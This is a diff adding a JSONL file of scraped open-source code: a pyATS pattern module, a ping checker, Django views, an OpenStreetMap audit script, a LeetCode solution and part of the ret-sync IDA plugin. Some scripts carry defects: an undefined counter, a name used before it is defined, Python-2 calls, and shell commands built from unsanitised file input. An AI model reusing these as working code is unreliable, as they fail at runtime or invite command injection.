diff --git "a/3141.jsonl" "b/3141.jsonl" new file mode 100644--- /dev/null +++ "b/3141.jsonl" @@ -0,0 +1,811 @@ +{"seq_id":"74210550807","text":"'''\nUnicon Plugin Patterns\n----------------------\n\nPattern module in a Unicon plugin allows developers to consolidate all\nregex patterns that matches dialogs, statements & the likes into one location.\n\n'''\n\nlogin_prompt = r' *login here: *?'\nconfirm_imaginary = r' *press ENTER to confirm imaginary platform\\.\\.\\.'\n","repo_name":"CiscoDevNet/pyats-plugin-examples","sub_path":"unicon_plugin_example/src/unicon_plugin_example/patterns.py","file_name":"patterns.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"31"} +{"seq_id":"70126766488","text":"import os, time, sys\n\n\ndef checkIPs(path):\n f = open(path)\n lines = f.readlines()\n start_time = int(time.time())\n count_success = 0\n count_fail = 0\n success = []\n\n for line in lines:\n ip = line.replace('\\n', '')\n result = os.system('ping -c1 -W1 %s'%ip)\n if result:\n print(\"ping %s is fail\" % (ip))\n count_false += 1\n else:\n\n print(\"ping %s is ok\" % (ip))\n count_success += 1\n success.append(ip)\n\n end_time = int(time.time())\n cost_time = end_time - start_time\n print(\"time(秒):\", cost_time,\"s\")\n print(\"ping通的ip数:\", count_success, \" ping不通的ip数:\", count_fail)\n print(\"可以使用的节点: \", \"\\033[32m%s\\r\\033[0m\" % success)\n\n return (cost_time, count_success, count_fail, success)\n\n\n","repo_name":"lforme/pingtest","sub_path":"checkss.py","file_name":"checkss.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"27221482661","text":"from django.contrib.auth.models import User\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\nfrom django.shortcuts import get_object_or_404, render, redirect\nfrom django.http import HttpResponse, HttpResponseRedirect, Http404\nfrom django.views import generic\nfrom wsgiref.util import FileWrapper\nfrom django.utils.encoding import smart_str\nimport mimetypes\nimport os\n\nfrom .models import Profile\nfrom .forms import EditProfileForm\nfrom .utils import get_or_create_profile\nfrom penndsg.settings import MEDIA_ROOT\n\n\n@login_required\ndef profile_detail_view(request):\n p = get_or_create_profile(request.user)\n context = {'profile': p}\n return render(request, 'profile/detail.html', context)\n\n\n@login_required\ndef edit_profile_view(request):\n p = get_or_create_profile(request.user)\n if request.method == 'POST':\n form = EditProfileForm(request.POST, request.FILES, instance=p)\n if form.is_valid():\n form.save()\n messages.add_message(\n request, messages.SUCCESS, 'Changes saved successfully'\n )\n return redirect('account:detail')\n else:\n messages.add_message(\n request, messages.ERROR, 'An error occurred'\n )\n return redirect('account:edit')\n else:\n form = EditProfileForm(instance=p)\n context = {'form': form}\n return render(request, 'profile/edit.html', context)\n\n\n@login_required\ndef download_resume(request):\n try:\n file_path = request.user.profile.resume.name\n except:\n raise Http404(\"No resume found.\")\n # https://stackoverflow.com/q/15246661/2680824\n file_name = os.path.basename(file_path)\n file_path = MEDIA_ROOT + '/' + file_path\n file_wrapper = FileWrapper(open(file_path,'rb'))\n file_mimetype = mimetypes.guess_type(file_path)\n response = HttpResponse(file_wrapper, 
content_type=file_mimetype )\n response['X-Sendfile'] = file_path\n response['Content-Length'] = os.stat(file_path).st_size\n response['Content-Disposition'] = (\n 'attachment; filename={}'.format(smart_str(file_name))\n )\n return response\n","repo_name":"benlindsay/pdsg-django","sub_path":"account/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70829710168","text":"import xml.etree.ElementTree as ET\r\nfrom collections import defaultdict\r\nimport pprint\r\nimport re\r\n\r\n############################################\r\n# 探索用户\r\n############################################\r\nBASIC_NODES = [\"relation\", \"node\", \"way\"]\r\n\r\ndef get_user(element):\r\n return element.get(\"uid\"), element.get(\"user\")\r\n\r\n#获取所有的用户-id对\r\ndef get_user_of_map(filename):\r\n users = set()\r\n for _, element in ET.iterparse(filename):\r\n if element.tag in BASIC_NODES:\r\n user_id, user_name = get_user(element)\r\n users.add(user_id + ':' + user_name)\r\n return users\r\n\r\nusers_set = get_user_of_map(OSM_FILE_NAME)\r\nprint(len(users_set))\r\nprint(users_set)\r\n\r\n###########################################\r\n# 街道名(课程内代码)\r\nOSM_FILE_NAME = \"map.xml\"\r\n#匹配街道名称最后独立字符串(称谓)\r\nstreet_type_re = re.compile(r'\\b\\S+\\.?$', re.IGNORECASE)\r\n\r\nexpected = [\"Street\", \"Avenue\", \"Boulevard\", \"Drive\", \"Court\", \"Place\", \"Square\", \"Lane\", \"Road\", \r\n \"Trail\", \"Parkway\", \"Commons\"]\r\n\r\n# UPDATE THIS VARIABLE\r\nmapping = { \"St\": \"Street\",\r\n \"St.\": \"Street\",\r\n \"Rd\": \"Road\",\r\n \"Rd.\": \"Road\",\r\n \"Ave\": \"Avenue\"\r\n }\r\ndef audit_street_type(street_types, street_name):\r\n m = re.search(street_type_re, street_name)\r\n if m:\r\n street_type = m.group()\r\n if street_type not in expected:\r\n street_types[street_type].add(street_name)\r\n\r\n\r\ndef is_street_name(elem):\r\n return (elem.attrib['k'] == \"addr:street\")\r\n\r\n\r\ndef audit(osmfile):\r\n osm_file = open(osmfile, \"r\")\r\n street_types = defaultdict(set)\r\n \r\n for event, elem in ET.iterparse(osm_file, events=(\"start\",)):\r\n if elem.tag == \"node\" or elem.tag == \"way\":\r\n for tag in elem.iter(\"tag\"):\r\n if is_street_name(tag):\r\n audit_street_type(street_types, tag.attrib['v'])\r\n \r\n osm_file.close()\r\n return street_types\r\n\r\n\r\ndef update_name(name, mapping):\r\n for from_name, to_name in mapping.iteritems():\r\n #print '(.*)(' + from_name + ')$'\r\n name_regex = re.compile(r'(.*)(' + from_name + ')$', re.IGNORECASE)\r\n match_result = re.search(name_regex, name)\r\n\r\n if match_result:\r\n name = match_result.group(1) + to_name\r\n break;\r\n return name","repo_name":"jdzyh/DataAnalysis","sub_path":"Program/1.OpenStreetmap/UPDATE_CONTENT/audit_codes/discover_nodes.py","file_name":"discover_nodes.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"31488863691","text":"from typing import List, Deque\nfrom collections import deque\n\nclass NumberOfIslands:\n \"\"\"\n 200. Number of Islands\n\n Given an m x n 2D binary grid grid which represents a map of '1's (land) and '0's (water), return the number of islands.\n\n An island is surrounded by water and is formed by connecting adjacent lands horizontally or vertically. 
\n\n You may assume all four edges of the grid are all surrounded by water.\n \"\"\"\n def numIslands(self, grid: List[List[str]]) -> int:\n \"\"\"\n Breadth first search\n\n O(n^2*v+e)\n\n # define a queue for traversal\n # define a set for visited nodes\n\n # loop over rows and cols\n # continue if row,col is in visited\n # if element == 1 add it to queue\n \n # if queue is not empty\n # while queue is not empty:\n # check all four directions, if any of them contains a '1' add them to the queue and visited\n \n # increment island count by 1\n \n # return island count\n\n Explanation: \n \n Whenever we find a '1', we try to do a BFS using it as the root node, by adding all elements that are equal to '1'\n\n that are adjacent vertically or horizontally, and each element we find we add it to visited nodes to avoid circular infinite loops\n\n https://leetcode.com/problems/number-of-islands/submissions/868721672/\n \"\"\"\n queue = deque() # type: Deque[str]\n visited = set()\n island_count = 0\n \n for row_index, row in enumerate(grid):\n for col_index, col in enumerate(row):\n if f'{row_index},{col_index}' in visited:\n continue\n \n if col == '1':\n queue.append(f'{row_index},{col_index}')\n visited.add(f'{row_index},{col_index}')\n \n if queue:\n while queue:\n traversal_row, traversal_col = map(int, queue.popleft().split(','))\n if traversal_row + 1 < len(grid) and grid[traversal_row+1][traversal_col] == '1' and f'{traversal_row+1},{traversal_col}' not in visited:\n queue.append(f'{traversal_row+1},{traversal_col}')\n visited.add(f'{traversal_row+1},{traversal_col}')\n\n if traversal_row - 1 >= 0 and grid[traversal_row-1][traversal_col] == '1' and f'{traversal_row-1},{traversal_col}' not in visited:\n queue.append(f'{traversal_row-1},{traversal_col}')\n visited.add(f'{traversal_row-1},{traversal_col}')\n\n if traversal_col - 1 >= 0 and grid[traversal_row][traversal_col-1] == '1' and f'{traversal_row},{traversal_col-1}' not in visited:\n queue.append(f'{traversal_row},{traversal_col-1}')\n visited.add(f'{traversal_row},{traversal_col-1}')\n\n if traversal_col + 1 < len(row) and grid[traversal_row][traversal_col+1] == '1' and f'{traversal_row},{traversal_col+1}' not in visited:\n queue.append(f'{traversal_row},{traversal_col+1}')\n visited.add(f'{traversal_row},{traversal_col+1}')\n \n island_count += 1\n \n return island_count\n\nif __name__ == '__main__':\n obj = NumberOfIslands()\n\n assert obj.numIslands([\n [\"1\",\"1\",\"1\",\"1\",\"0\"],\n [\"1\",\"1\",\"0\",\"1\",\"0\"],\n [\"1\",\"1\",\"0\",\"0\",\"0\"],\n [\"0\",\"0\",\"0\",\"0\",\"0\"]\n ]) == 1\n\n assert obj.numIslands([\n [\"1\",\"1\",\"0\",\"0\",\"0\"],\n [\"1\",\"1\",\"0\",\"0\",\"0\"],\n [\"0\",\"0\",\"1\",\"0\",\"0\"],\n [\"0\",\"0\",\"0\",\"1\",\"1\"]\n ]) == 3","repo_name":"Abdul-fattah-Tayih/leetcode-submissions","sub_path":"solutions/number_of_islands.py","file_name":"number_of_islands.py","file_ext":"py","file_size_in_byte":3955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73249079767","text":"import os\nimport re\nimport sys\nimport time\nimport traceback\nimport struct\nimport binascii\nimport base64\nimport socket\nimport json\nimport uuid\nimport argparse\n\nfrom retsync.syncrays import Syncrays\nimport retsync.rsconfig as rsconfig\nfrom retsync.rsconfig import rs_encode, rs_decode, rs_log, rs_debug, load_configuration\n\nfrom PyQt5 import QtCore, QtWidgets\nfrom PyQt5.QtCore import QProcess, QProcessEnvironment\n\nimport idc\nimport idaapi\nimport 
idautils\nimport ida_bytes\nimport ida_graph\nimport ida_range\nimport ida_funcs\nimport ida_name\nimport ida_hexrays\nimport ida_kernwin\nimport ida_idaapi\nimport ida_dbg\nimport ida_nalt\n\nfrom idaapi import PluginForm\n\n\n# get PYTHON_PATH settings, based on platform\nPYTHON_PATH = rsconfig.get_python_interpreter()\nos.environ['PYTHON_PATH'] = PYTHON_PATH\n\n# default value is current script's path\nBROKER_PATH = os.path.join(os.path.normpath(os.path.dirname(__file__)), rsconfig.PLUGIN_DIR, 'broker.py')\nif not os.path.exists(BROKER_PATH):\n rs_log(\"[-] broker path is not properly set, current value: <%s>\" % BROKER_PATH)\n raise RuntimeError\n\nos.environ['IDB_PATH'] = os.path.dirname(os.path.realpath(idaapi.get_path(idaapi.PATH_TYPE_IDB)))\n\nCOL_CBTRACE = rsconfig.COL_CBTRACE\n\n\n# --------------------------------------------------------------------------\n\n\nclass RequestHandler(object):\n\n # color callback\n def cb_color(self, ea):\n idaapi.set_item_color(ea, COL_CBTRACE)\n\n # instruction step callback\n def cb_curline(self, ea):\n if self.prev_loc:\n prev_ea, prev_color = self.prev_loc\n cur_color = idaapi.get_item_color(prev_ea)\n # race condition: block/instruction's color may have been modified\n # after it was saved\n if (cur_color != prev_color) and (cur_color != rsconfig.COL_CURLINE):\n prev_color = cur_color\n idaapi.set_item_color(prev_ea, prev_color)\n\n self.prev_loc = [ea, idaapi.get_item_color(ea)]\n idaapi.set_item_color(ea, rsconfig.COL_CURLINE)\n\n def cb_restore_last_line(self):\n if self.prev_loc:\n ea, col = self.prev_loc\n idaapi.set_item_color(ea, col)\n\n # support -a / --address switch\n def addr_switch(self, offset, msg):\n if (not msg) or (msg == ''):\n return [offset, msg]\n\n try:\n args = self.parser.parse_args(msg.split())\n except argparse.ArgumentError:\n rs_log('failed to parse command')\n return [None, msg]\n\n # no address switch supplied\n if not args.address:\n return [offset, msg]\n\n try:\n addr = int(''.join(args.address), 16)\n except (TypeError, ValueError):\n rs_log('failed to parse address, should be hex')\n return [None, msg]\n\n # make sure the address points to a valid instruction/data\n head = idaapi.get_item_head(addr)\n if head != addr:\n rs_log(\"ambiguous address, did you mean 0x%x ?\" % head)\n return [None, msg]\n\n return [addr, ' '.join(args.msg)]\n\n # check if address is within a valid segment\n def is_safe(self, offset):\n return not (idc.get_segm_start(offset) == ida_idaapi.BADADDR)\n\n # rebase (and update) address with respect to local image base\n def rebase(self, base, offset):\n if base is not None:\n # check for non-compliant debugger client\n if base > offset:\n rs_log('unsafe addr: 0x%x > 0x%x' % (base, offset))\n return None\n\n # update base address of remote module\n if self.base_remote != base:\n self.base_remote = base\n\n offset = self.rebase_local(offset)\n\n if not self.is_safe(offset):\n rs_log('unsafe addr: 0x%x not in valid segment' % (offset))\n return None\n\n return offset\n\n # rebase address with respect to local image base\n def rebase_local(self, offset):\n if not (self.base == self.base_remote):\n offset = (offset - self.base_remote) + self.base\n\n return offset\n\n # rebase address with respect to remote image base\n def rebase_remote(self, offset):\n if not (self.base == self.base_remote):\n offset = (offset - self.base) + self.base_remote\n\n return offset\n\n # demangle names\n def demangle(self, name):\n mask = idc.get_inf_attr(idc.INF_SHORT_DEMNAMES)\n demangled = 
idc.demangle_name(name, mask)\n if demangled is None:\n return name\n else:\n return demangled\n\n # prevent flooding debug engine with too much commands\n # sync plugin does NOT wait for any sort of ack\n # example: \"^ Debuggee already running error in 'g'\"\n def notice_anti_flood(self):\n time.sleep(0.1)\n\n # append comment and handle cmt's size limitation (near 1024)\n def append_cmt(self, ea, cmt, rptble=False):\n if len(cmt) > 1024:\n rs_log(\"warning, comment needs to be splitted (from 0x%x)\" % ea)\n nh = idaapi.next_head(ea, ida_idaapi.BADADDR)\n if nh == ida_idaapi.BADADDR:\n rs_log('[x] failed to find next instruction candidate')\n return\n\n self.append_cmt(nh, cmt[1024:], rptble)\n cmt = cmt[:1024]\n\n idaapi.append_cmt(ea, cmt, rptble)\n\n # location request, update disassembly IDA view\n def req_loc(self, hash):\n offset, base = hash['offset'], hash.get('base')\n ea = self.rebase(base, offset)\n if not ea:\n return\n\n if self.color:\n self.cb_color(ea)\n\n idaapi.jumpto(ea)\n self.cb_curline(ea)\n self.gm.center()\n\n if self.hexsync.enabled:\n self.hexsync.cb_loc(ea)\n\n # set remote base on purpose\n def req_rbase(self, hash):\n rbase = hash['rbase']\n self.base_remote = rbase\n\n # log command output request at addr\n def req_cmd(self, hash):\n msg_b64, offset, base = hash['msg'], hash['offset'], hash['base']\n msg = rs_decode(base64.b64decode(msg_b64))\n ea = self.rebase(base, offset)\n if not ea:\n return\n\n rs_log(\"cmd output added at 0x%x\" % ea)\n self.append_cmt(ea, str(msg))\n\n # reset comment at addr\n def req_rcmt(self, hash):\n msg, offset, base = hash['msg'], hash['offset'], hash['base']\n offset, msg = self.addr_switch(offset, msg)\n if not offset:\n return\n\n ea = self.rebase(base, offset)\n if not ea:\n return\n\n idaapi.set_cmt(ea, str(''), False)\n rs_log(\"reset comment at 0x%x\" % ea)\n\n # add comment request at addr\n def req_cmt(self, hash):\n msg, offset, base = hash['msg'], hash['offset'], hash['base']\n offset, msg = self.addr_switch(offset, msg)\n if not offset:\n return\n\n ea = self.rebase(base, offset)\n if not ea:\n return\n\n self.append_cmt(ea, str(msg))\n rs_log(\"comment added at 0x%x\" % ea)\n\n # add a function comment at addr\n def req_fcmt(self, hash):\n msg, offset, base = hash['msg'], hash['offset'], hash['base']\n offset, msg = self.addr_switch(offset, msg)\n if not offset:\n return\n\n ea = self.rebase(base, offset)\n if not ea:\n return\n\n func = idaapi.get_func(ea)\n if not func:\n rs_log(\"could not find func for 0x%x\" % ea)\n return\n\n idaapi.set_func_cmt(func, str(msg), False)\n rs_log(\"function comment added at 0x%x\" % ea)\n\n # add an address comment request at addr\n def req_raddr(self, hash):\n raddr, rbase, offset, base = hash['raddr'], hash['rbase'], hash['offset'], hash['base']\n ea = self.rebase(base, offset)\n if not ea:\n return\n\n if self.base_remote != rbase:\n rs_log('could not rebase this address, 0x%x != 0x0, not in module')\n return\n\n addr = self.rebase(rbase, raddr)\n if not addr:\n return\n\n self.append_cmt(ea, \"0x%x (rebased from 0x%x)\" % (addr, raddr))\n rs_log(\"comment added at 0x%x\" % ea)\n\n # return current cursor in IDA Pro\n def req_cursor(self, hash):\n rs_log('request IDA Pro cursor position')\n addr = self.rebase_remote(idc.get_screen_ea())\n self.notice_broker('cmd', \"\\\"cmd\\\":\\\"0x%x\\\"\" % addr)\n return\n\n # patch memory at specified address using info from debugger\n def req_patch(self, hash):\n addr, value, length = hash['addr'], hash['value'], hash['len']\n\n if 
length == 4:\n prev_value = idc.get_wide_dword(addr)\n if not ida_bytes.create_data(addr, ida_bytes.FF_DWORD, 4, ida_idaapi.BADADDR):\n rs_log('[x] ida_bytes.create_data FF_DWORD failed')\n if not ida_bytes.patch_dword(addr, value):\n rs_log('[x] patch_dword failed')\n if not idc.op_plain_offset(addr, 0, 0):\n rs_log('[x] op_plain_offset failed')\n\n elif length == 8:\n prev_value = idc.get_qword(addr)\n if not ida_bytes.create_data(addr, ida_bytes.FF_QWORD, 8, ida_idaapi.BADADDR):\n rs_log('[x] ida_bytes.create_data FF_QWORD failed')\n if not ida_bytes.patch_qword(addr, value):\n rs_log('[x] patch_qword failed')\n if not idc.op_plain_offset(addr, 0, 0):\n rs_log('[x] op_plain_offset failed')\n\n else:\n rs_log(\"[x] unsupported length: %d\" % length)\n return\n\n rs_log(\"patched 0x%x = 0x%x (previous was 0x%x)\" % (addr, value, prev_value))\n\n # return idb's symbol for a given address\n def req_rln(self, hash):\n raddr = hash['raddr']\n\n rs_debug(\"rln: 0x%x\" % raddr)\n\n addr = self.rebase_local(raddr)\n if not addr:\n rs_log(\"could not rebase this address (0x%x)\" % raddr)\n return\n\n sym = idaapi.get_func_name(addr)\n if sym:\n sym = self.demangle(sym)\n func = idaapi.get_func(addr)\n if not func:\n rs_log(\"could not find func for 0x%x\" % addr)\n return\n\n lck = idaapi.lock_func(func)\n limits = ida_range.range_t()\n rs = ida_range.rangeset_t()\n\n if ida_funcs.get_func_ranges(rs, func) != ida_idaapi.BADADDR:\n limits.start_ea = rs.begin().start_ea\n limits.end_ea = rs.begin().end_ea\n\n if limits.start_ea != addr:\n if (addr > limits.start_ea):\n sym = \"%s%s0x%x\" % (sym, \"+\", addr - limits.start_ea)\n else:\n sym = \"%s%s0x%x\" % (sym, \"-\", limits.start_ea - addr)\n lck = None\n else:\n sym = idc.get_name(addr, ida_name.GN_VISIBLE)\n if sym:\n sym = self.demangle(sym)\n\n if sym:\n self.notice_broker('cmd', \"\\\"cmd\\\":\\\"%s\\\"\" % sym)\n rs_debug(\"resolved symbol: %s\" % sym)\n else:\n rs_log(\"could not resolve symbol for address 0x%x\" % addr)\n\n # return address for a given idb's symbol\n def req_rrln(self, hash):\n sym = hash['sym']\n rs_log(\"rrln> symbol \\\"%s\\\"\" % sym)\n\n addr = idc.get_name_ea_simple(str(sym))\n if addr:\n raddr = self.rebase_remote(addr)\n self.notice_broker(\"cmd\", \"\\\"cmd\\\":\\\"%s\\\"\" % raddr)\n rs_log(\"rrln> remote: 0x%x, local: 0x%x)\" % (raddr, addr))\n else:\n rs_log(\"rrln> symbol not found \\\"%s\\\"\" % sym)\n\n # add label request at addr\n def req_lbl(self, hash):\n msg, offset, base = hash['msg'], hash['offset'], hash['base']\n offset, msg = self.addr_switch(offset, msg)\n if not offset:\n return\n\n ea = self.rebase(base, offset)\n if not ea:\n return\n\n flags = False\n if str(msg).startswith('@@'):\n flags = idaapi.SN_LOCAL\n\n idaapi.set_name(ea, str(msg), flags)\n rs_log(\"label added at 0x%x\" % ea)\n\n # color request at addr\n def req_bc(self, hash):\n global COL_CBTRACE\n msg, offset, base = hash['msg'], hash['offset'], hash['base']\n\n if self.is_active:\n ea = self.rebase(base, offset)\n if not ea:\n return\n else:\n ea = self.base\n\n if (msg == 'oneshot'):\n rs_log(\"color oneshot added at 0x%x\" % ea)\n # mark address as being colored\n self.prev_loc = [ea, COL_CBTRACE]\n elif (msg == 'on'):\n rs_log(\"color start from 0x%x\" % ea)\n self.color = True\n self.prev_loc = [ea, COL_CBTRACE]\n elif (msg == 'off'):\n rs_log(\"color end at 0x%x\" % ea)\n self.color = False\n elif (msg == 'set'):\n new_col = hash['rgb']\n if new_col > 0xffffff:\n rs_log('restoring color')\n new_col = rsconfig.COL_GREEN\n\n COL_CBTRACE = 
new_col\n rs_log(\"set color to 0x%x\" % COL_CBTRACE)\n else:\n rs_log(\"invalid color request (%s)\" % msg)\n\n # reload .bpcmds from idb\n def req_bps_get(self, hash):\n rs_log('[-] reload .bpcmds')\n node = idaapi.netnode(rsconfig.NETNODE_INDEX)\n if not node:\n rs_log('[-] failed to open netnode store')\n self.notice_broker(\"cmd\", \"\\\"cmd\\\":\\\"no blob\\\"\")\n return\n\n node.create(rsconfig.NETNODE_STORE)\n blob = rs_decode(node.getblob(0, str(chr(1))))\n\n if not blob:\n rs_log(' -> no blob')\n self.notice_broker('cmd', \"\\\"cmd\\\":\\\" -> reloading .bpcmds: no blob\\\"\")\n return\n\n self.notice_broker('cmd', \"\\\"cmd\\\":\\\"%s\\\"\" % blob)\n return\n\n # save .bpcmds to idb\n def req_bps_set(self, hash):\n blob = hash['msg']\n rs_log('[-] save .bpcmds')\n node = idaapi.netnode(rsconfig.NETNODE_INDEX)\n if not node:\n rs_log('[-] failed to open netnode store')\n self.notice_broker('cmd', \"\\\"cmd\\\":\\\" -> failed to save .bpcmds\")\n return\n\n new = node.create(rsconfig.NETNODE_STORE)\n if new == 0:\n rs_log(' -> creating new netnode store')\n\n out = node.setblob(rs_encode(blob), 0, chr(1))\n self.notice_broker(\"cmd\", \"\\\"cmd\\\":\\\" -> .bpcmds saved\\\"\")\n return\n\n # compare loaded module md5 with idb's input file md5\n def req_modcheck(self, hash):\n md5, pdb = hash.get('md5'), hash.get('pdb')\n remote = None\n\n if md5:\n rs_log(\"modcheck idb (md5)\")\n local = rs_decode(binascii.hexlify(idaapi.retrieve_input_file_md5())).upper()\n remote = (''.join(md5.split())).upper()\n elif pdb:\n rs_log(\"modcheck idb (pdb guid)\")\n msg = rs_decode(base64.b64decode(pdb))\n local = DbgDirHlpr.read_rsds_guid()\n remote = DbgDirHlpr.parse_itoldyouso_output(msg)\n\n rs_log(\" -> remote: <%s>\" % remote)\n rs_log(\" -> local : <%s>\" % local)\n\n if remote == '0':\n output = '[!] warning, no Debug Directory'\n elif local == remote:\n output = '[+] module successfully matched'\n else:\n output = '[!] 
warning, modules mismatch'\n\n rs_log(output)\n self.notice_broker(\"cmd\", \"\\\"cmd\\\":\\\"%s\\\"\" % output)\n return\n\n # specify debugger dialect used to send commands\n def req_set_dbg_dialect(self, hash):\n global SyncForm\n dialect = hash['dialect']\n if dialect in rsconfig.DBG_DIALECTS:\n self.dbg_dialect = rsconfig.DBG_DIALECTS[dialect]\n rs_log(\"set debugger dialect to %s, enabling hotkeys\" % dialect)\n SyncForm.init_hotkeys()\n else:\n SyncForm.uninit_hotkeys()\n\n # request from broker\n def req_broker(self, hash):\n subtype = hash['subtype']\n\n if (subtype == 'msg'):\n # simple message announcement\n rs_log(\"<< broker << %s\" % hash['msg'])\n\n elif(subtype == 'notice'):\n # notice from broker\n self.broker_port = int(hash['port'])\n rs_debug(\"<< broker << binding on port %d\" % self.broker_port)\n\n for attempt in range(rsconfig.CONNECT_BROKER_MAX_ATTEMPT):\n try:\n host = socket.gethostbyname('localhost')\n self.broker_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.broker_sock.settimeout(2)\n self.broker_sock.connect((host, self.broker_port))\n break\n except socket.error:\n rs_log('failed to connect to broker')\n rs_log(sys.exc_info())\n if self.broker_sock:\n self.broker_sock.close()\n self.broker_sock = None\n time.sleep(0.1)\n if (attempt == (rsconfig.CONNECT_BROKER_MAX_ATTEMPT - 1)):\n self.announcement(\"[sync] failed to connect to broker (attempt %d)\" % attempt)\n raise RuntimeError\n\n # request broker to validate its beacon\n time.sleep(0.4)\n self.beacon_notice()\n\n # enable/disable idb, if disable it drops most sync requests\n elif(subtype == 'enable_idb'):\n self.is_active = True\n rs_log('idb is enabled')\n\n elif(subtype == 'disable_idb'):\n self.is_active = False\n self.base_remote = None\n self.cb_restore_last_line()\n rs_log('idb is disabled')\n\n # parse and execute request\n # Note that sometimes we don't receive the whole request from the broker.py\n # so parsing fails. One way for fixing this would be to fix broker.py to get\n # everything until \"\\n\" before proxying it but the way we do here is to read\n # everything until \"}\" is received (end of json)\n def parse_exec(self, req):\n if self.prev_req:\n if self.prev_req != \"\":\n if rsconfig.DEBUG_JSON:\n rs_log(\"JSON merge with request: \\\"%s\\\"\" % req)\n\n req = self.prev_req + req\n self.prev_req = \"\"\n if req == '':\n return\n if rsconfig.DEBUG_JSON:\n rs_log(\"parse_exec -> \" + str(req))\n\n if not (req.startswith('[sync]')):\n rs_log(\"[<] bad hdr %s\" % repr(req))\n rs_log('[-] Request dropped due to bad header')\n return\n\n req_ = self.normalize(req, 6)\n\n try:\n hash = json.loads(req_)\n except ValueError:\n if rsconfig.DEBUG_JSON:\n rs_log(\"[x] Sync failed to parse json\\n '%s'. 
Caching for next req...\" % req_)\n rs_log(\"------------------------------------\")\n self.prev_req = req\n return\n\n rtype = hash['type']\n if rtype not in self.req_handlers:\n rs_log(\"unknown request: %s\" % rtype)\n return\n\n req_handler = self.req_handlers[rtype]\n\n # few requests are handled even though idb is not enable\n if rtype in ['broker', 'dialect', 'bc']:\n req_handler(hash)\n else:\n if self.is_active:\n req_handler(hash)\n else:\n rs_debug(\"[-] Drop the %s request because idb is not enabled\" % rtype)\n return\n\n idaapi.refresh_idaview_anyway()\n\n def normalize(self, req, taglen):\n req = req[taglen:]\n req = req.replace(\"\\\\\", \"\\\\\\\\\")\n req = req.replace(\"\\n\", \"\")\n return req.strip()\n\n # send a kill notice to the broker (then forwarded to the dispatcher)\n def kill_notice(self):\n self.notice_broker(\"kill\")\n\n # send a beacon notice to the broker\n def beacon_notice(self):\n self.notice_broker('beacon')\n\n # send a bp command (F2) to the debugger (via the broker and dispatcher)\n def bp_notice(self, oneshot=False):\n if not self.is_active:\n rs_log(\"idb isn't enabled, bp can't be set\")\n return\n\n ea = idaapi.get_screen_ea()\n offset = self.rebase_remote(ea)\n cmd = \"%s0x%x\" % (self.dbg_dialect['bp1' if oneshot else 'bp'], offset)\n\n if (oneshot and 'oneshot_post' in self.dbg_dialect):\n cmd += self.dbg_dialect['oneshot_post']\n\n self.notice_broker(\"cmd\", \"\\\"cmd\\\":\\\"%s\\\"\" % cmd)\n rs_log(\">> set %s\" % cmd)\n\n # send a hardware bp command (Ctrl-F2) to the debugger (via the broker and dispatcher)\n def hbp_notice(self, oneshot=False):\n if not self.is_active:\n rs_log(\"idb isn't enabled, hbp can't be set\")\n return\n\n ea = idaapi.get_screen_ea()\n offset = self.rebase_remote(ea)\n cmd = \"%s0x%x\" % (self.dbg_dialect['hbp1' if oneshot else 'hbp'], offset)\n\n self.notice_broker(\"cmd\", \"\\\"cmd\\\":\\\"%s\\\"\" % cmd)\n rs_log(\">> set %s\" % cmd)\n\n # send a oneshot bp command (F3) to the debugger (via the broker and dispatcher)\n def bp_oneshot_notice(self):\n self.bp_notice(True)\n\n # send a oneshot hardware bp command (Ctrl-F3) to the debugger (via the broker and dispatcher)\n def hbp_oneshot_notice(self):\n self.hbp_notice(True)\n\n # export IDB's breakpoint (Ctrl-F1) to the debugger (via the broker and dispatcher)\n def export_bp_notice(self):\n if not self.dbg_dialect:\n rs_log(\"idb isn't synced yet, can't export bp\")\n return\n\n is_windbg = (self.dbg_dialect == 'windbg')\n\n # Windbg supports relative address, ie. 
mod+0xCAFE\n # for non relative address the remote base address is needed\n if (not is_windbg) and (not self.base_remote):\n rs_log(\"idb isn't enabled, can't export bp\")\n return\n\n mod = self.name.split('.')[0].strip()\n nbp = ida_dbg.get_bpt_qty()\n\n for i in range(nbp):\n ea = idc.get_bpt_ea(i)\n attrs = [idc.BPTATTR_TYPE, idc.BPTATTR_COND, idc.BPTATTR_FLAGS]\n btype, cond, flags = [idc.get_bpt_attr(ea, x) for x in attrs]\n\n if cond:\n rs_log(\"bp %d: conditional bp not supported\" % i)\n else:\n if ((btype in [idc.BPT_EXEC, idc.BPT_SOFT]) and\n ((flags & idc.BPT_ENABLED) != 0)):\n\n bp = self.dbg_dialect['hbp' if (btype == idc.BPT_EXEC) else 'bp']\n\n if is_windbg:\n offset = ea - self.base\n cmd = \"%s%s+0x%x\" % (bp, mod, offset)\n else:\n offset = self.rebase_remote(ea)\n cmd = \"%s0x%x\" % (bp, offset)\n\n self.notice_broker(\"cmd\", \"\\\"cmd\\\":\\\"%s\\\"\" % cmd)\n rs_log(\"bp %d: %s\" % (i, cmd))\n\n rs_log('export done')\n\n # send a translate command (Alt-F2) to the debugger (via the broker and dispatcher)\n def translate_notice(self):\n if not self.dbg_dialect:\n rs_log(\"idb isn't synced yet, can't translate\")\n return\n\n ea = idaapi.get_screen_ea()\n mod = self.name.split('.')[0].strip()\n cmd = self.dbg_dialect['prefix'] + \"translate 0x%x 0x%x %s\" % (self.base, ea, mod)\n self.notice_broker(\"cmd\", \"\\\"cmd\\\":\\\"%s\\\"\" % cmd)\n rs_debug(\"translate address 0x%x\" % ea)\n\n # send a command to the debugger (via the broker and dispatcher)\n def cmd_notice(self, cmd, descr):\n if cmd in self.dbg_dialect:\n self.notice_broker(\"cmd\", \"\\\"cmd\\\":\\\"%s\\\"\" % self.dbg_dialect[cmd])\n self.notice_anti_flood()\n else:\n rs_log(\"the \\\"%s\\\" command is not available for the current debugger\" % cmd)\n\n # send a go command (Alt-F5) to the debugger 